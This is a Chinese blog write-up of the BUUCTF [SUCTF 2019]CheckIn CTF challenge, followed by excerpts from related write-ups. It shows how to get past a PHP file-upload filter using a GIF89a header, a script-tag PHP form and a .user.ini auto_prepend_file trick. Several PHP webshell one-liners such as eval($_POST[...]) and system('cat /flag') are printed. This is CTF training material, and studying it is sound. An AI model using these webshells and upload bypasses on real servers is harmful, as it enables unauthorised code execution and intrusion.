BUUCTF [SUCTF 2019]CheckIn

最新推荐文章于 2024-06-11 18:30:48 发布
最新推荐文章于 2024-06-11 18:30:48 发布
阅读量383 收藏
点赞数 1
分类专栏: Web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/crotzz/article/details/118726247
版权
CTF 同时被 2 个专栏收录
18 篇文章 1 订阅
订阅专栏
Web
16 篇文章 0 订阅
订阅专栏

可以看到是类文件上传题
在这里插入图片描述
上传普通的php文件会报错
这个题目有俩个点
1、一是绕过exif_imagetype函数,这是个判断图像类型函数,只要在文件前加上图片文件头就能绕过,另外这里有不包含<?的限制,可以用script绕过

GIF89a
<script language='php'>system('cat /flag');</script>

也可以用修改一句话木马后的图片马,最后用蚁剑连接的形式得到flag
2、上传.user.ini文件。
某些网站限制不允许上传.php文件,你便可以上传一个.user.ini,再上传一个图片马,包含起来进行getshell。不过前提是含有.user.ini的文件夹下需要有正常的php文件,否则也不能包含了。
这里给个浅谈.user.ini的利用的网站

https://xz.aliyun.com/t/6091

GIF89a
auto_prepend_file=xxx.jpg

在这里插入图片描述
在这里插入图片描述
上传好两个文件,然后进入uploads/2303408bc8f81642a7eca33d9ae08b5b/index.php的链接就可以得到flag
在这里插入图片描述

维多利亚蜜汁鱼
关注
专栏目录
buuctf web 13、[SUCTF 2019]CheckIn
m0_46412682的博客
07-16 1087
buuctf web 13、[SUCTF 2019]CheckIn 开始的页面 1、 先上传一个正常的照片 2、再上传一个php文件,提示illegal suffix 3、上传一个只含一句话木马的后缀为gif的文件,提示内容中有<? 既然过滤了<? ,所以用 4、上传7.gif,但是提示不是gif类型,exif_imagetype是文件内容的头部看是否是对应的照片类型 我们只需要再文件中填写对应的照片头部 上传成功 5、但是要怎么样才能让照片木马执行,我们想到.htaccess
BUUCTF_[SUCTF 2019]CheckIn
TenG的博客
05-22 1179
前言 问君能有几多愁?恰似一江春水向东流 先扯些题外话,这个题目是在BUUCTF刷到的,本来以为就是普通的文件上传,但是看了其他师傅的文章以后发现了新姿势,这次利用到的知识点也刷新了我对文件上传类题目的认知,所以特此记录一下。本文也参考了这位大师傅的文章,然后再结合我自己的理解记录下来,当然我的理解还不够透彻,所以还请各位师傅多多指教。 正文 先来看下题目页面 可以看到这就是普通的文件上传页面,开始呢我也是用的以前的常规方法去试的,什么修改MIME类型、图片合成马、00截断啊都试了,但是没有一个能用的。
buuctf-SUCTF 2019 CheckIn(小宇特详解)
小宇的web博客
01-22 2899
buuctf-SUCTF 2019 CheckIn(小宇特详解) 咋一看这是一道文件上传 这里先尝试一下上传一个php文件 里面写一个最简单的一句话木马就行 <?php eval(@$_POST['shell']);?> 上传试试 回显illegal suffix!(非法后缀) 这里尝试一下修改文件拓展名php5,phtml,等都没有成功 然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀) 这里我上传一张jpg 回显<? in conten
BUUCTF:[SUCTF 2019]CheckIn
末初的CSDN博客
11-04 1297
题目地址:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 上传文件后缀名黑名单机制,常用php及相关可解析扩展名等无法成功上传 使用.user.ini构造后门 user.ini如何构造后门详情见P神:https://www.leavesongs.com/PENETRATION/php-user-ini-backdoor.html 首先制造图片马 图片马不能包含<?,使用 <script language="php">eval($.
BUUCTF——[SUCTF 2019]CheckIn 1
weixin_45864041的博客
09-27 3616
根据普通的文件上传漏洞走 上传shell.jpg后可以看见上传失败,并且对文件的内容进行了检查。所以,我们换一种木马形式。 用shell.phtml进行上传。 上传失败,对文件内容进行了检查。利用文件幻术头进行绕过。 上传成功。接下来,我们再一次上传并抓包,修改文件后缀 上传又失败了。如果我们仅上传jpg文件,是无法让我们通过中国菜刀进行连接的。 最后束手无策只有看了一下大佬的wp 又学到了新姿势。 可以上传一个.user.ini 文件,当我们对目录中的任何php文件进行访问时,都会调用.use.
SUctf checkIn
舞动的獾
10-08 555
看了道上传的关于.user.ini的题目,这里试着做一下 题目地址 buuctf checkln 打开题目,出现了简单的上传框 试着上传php文件 更改名称为phps,php3,php4,php5,Php,pphphp,都上传失败. 试试改为jpg 发现它对<?内容进行了检验。 我们可以构造这种形式的木马 <script language="php"> @eval($_P...
BUUCTF-WriteUp
鱼的博客
02-01 737
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
BUUCTF-WEB
ccfly1012的博客
11-02 3866
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF WEB [SUCTF 2019]CheckIn
A_dmin的博客
12-14 1567
BUUCTF WEB [SUCTF 2019]CheckIn 打开页面是一个上传界面: 而且题目提示给了源码!GitHub上面,看了看还有flag嘞~~ 这不重要,我是来看源码的!!!index.php源码如下: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8">...
BUUCTF-[SUCTF 2019]CheckIn
m0_61361405的博客
10-10 137
`: 这个条件语句使用正则表达式检查 `$extension` 是否包含 "ph" 或 "htacess",如果是,表示上传的文件扩展名不被允许,代码将输出 "illegal suffix!13. `if (!`: 这行代码使用 `scandir` 函数列出目录 `$userdir` 中的文件和子目录,并将结果打印出来,以展示上传到该目录的文件列表。4. `if (isset($_POST["upload"])) {`: 这个条件语句检查是否有名为 "upload" 的 POST 参数被发送到服务器。
BUUCTF---web---[SUCTF 2019]CheckIn
最新发布
2201_75556700的博客
06-11 935
7、先上传.user.ini文件,再上传图片马test.jpg。上传.user.ini后出现下面回显。.user.ini文件内容为:(文件命名必须和上传的图片马文件名一样,我这里是test.jpg)2、上传正常的jpg文件,提示内容不能有<?4、将上面的一句话木马先写成txt再修改后缀为test.jpg后上传。5、必须要是图片类型,将一句话木马,添加图片头后再上传。6、上传成功了,但是需要让图片马当成php代码来执行。10、使用系统函数,查看文件根目录,发现flag文件。9、测试,发现文件上传成功。
BUUCTF-CheckIn
m0_47571887的博客
11-09 811
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
BUUCTF [SUCTF 2019]CheckIn 1(user.ini文件构成的PHP后门 | 两种解法!)
m0_73734159的博客
11-28 1583
只需要重新开启题目环境即可,最后,做这道题的步骤是,先上传.user.ini配置文件,再去上传PHP一句话木马文件。因为我们使用的是auto_prepend_file,在主文件之前就已经自动解析文件名了,所以index.php主文件在最后面。php.ini大家都熟悉,那么我们就可以把.user.ini理解为用户可自定义的php.ini配置文件。绕过后缀的文件格式有php、php3、php4、php5、phtml、pht。.user.ini配置文件和.htaccess配置文件都是为了解析PHP代码。
BUUCTF_web_CheckIn
silence1_的博客
08-31 2187
BUUCTF_web_CheckIn 题目: 题目是SUCTF 2019的web题, 题目源码:https://github.com/team-su/SUCTF2019/tree/master/Web/checkIn 也是看了大佬的writeup才做出来,太菜了。。。orz 学到了一种新的上传姿势。 打开题目是一个上传界面。 随便上传一个php文件,意料之中被拦。 burp抓包改后缀为jpg,提示...
BUUCTF [SUCTF 2019]CheckIn 1
weixin_45642610的博客
01-17 737
BUUCTF [SUCTF 2019]CheckIn 1 文件包含,一句话木马上传。 直接上传一句话木马<?php eval($_POST['a']);?> 非法后缀 那就改后缀绕过,通常有phtml php3 php4 php5 Php php (空格) php pphphp 都试试,都不行。 这时候可以用图片上传。 在一个文件夹中随便复制粘贴来一张照片,创建一个txt文本,输入 GIF89a <script language=php>eval($_POST['a']);&l
buuctf WEB checkin1
qq_41696858的博客
09-28 295
这题考的文件上传 经典一句话先试试,回显文件格式不对,把php文件后缀改成jpg格式 第二次回显,显示文件中包含<?,那就把一句话,改成如下形式 <script language='php'>eval($_POST['niaho']);</script> 成功绕过<?匹配,回显不是图片格式,图片头绕过GIF89a 成功上传,下面就是如何上传php文件,或者执行php代码了 经过检测,对于文件类型进行了严格的过滤,改后缀肯定不行 经过检测,可以上传.user.ini文件(
Buuctf [GKCTF2020]CheckIN
CyhDl666的博客
03-19 336
进入网站直接贴了源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin.
2021gkctf checkin
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全挑战,包括密码学、逆向工程、漏洞利用等等。参赛者需要通过解决这些挑战来获取旗帜(flag),并提交给比赛组织者。 比赛的checkin阶段通常是指参赛者进行报名和注册的过程。具体的checkin流程可能因比赛组织者而异,一般需要填写个人信息、同意比赛规则等等。 如果你想了解更多关于2021gkctf checkin的信息,建议你访问GKSEC团队的官方网站或者参考他们的相关公告和规则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值